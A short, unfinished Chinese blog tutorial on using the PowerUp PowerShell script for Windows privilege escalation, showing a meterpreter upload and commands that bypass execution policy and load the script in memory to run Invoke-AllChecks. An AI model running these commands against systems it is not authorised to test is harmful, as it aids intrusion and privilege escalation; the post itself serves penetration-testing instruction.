PowerUp攻击模块实战演练(未完待续)

 
更多

介绍几个常用模块的实战应用。

实战一

在此实战中,用到了Invoke-AllChecks、Install-ServiceBinary、Get-ServiceUnquoted、Test-ServiceDaclPermission、Restore-ServiceBinary这几个模块。

先加载Powerup脚本,然后执行Invoke-AlChecks,脚本将进行所有检查。

将PowerUp脚本上传至目标服务器,再从本地执行该脚本。

meterpreter > upload /root/PowerUp.ps1 -> c:\

使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检测

Powershell.exe -exec bypass “IEX (New-Object Net.WebClient).downloadString(‘c:\PowerUp.ps1’);Invoke-AllChecks”

也可以在cmd环境下使用以下命令绕过执行该脚本

C:\>Powershell.exe -exec bypass -Command “&{Import-Module .\PowerUp.ps1;Invoke-AllChecks}”

可以看到,PowerUp列出了所有可能存在问题的服务,并在AbuseFunction中直接给出了利用方式。

未完待续。

打赏

本文固定链接: https://www.cxy163.net/archives/4862 | 绝缘体

该日志由 绝缘体.. 于 2020年05月12日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: PowerUp攻击模块实战演练(未完待续) | 绝缘体
关键字: , , , ,

PowerUp攻击模块实战演练(未完待续):等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter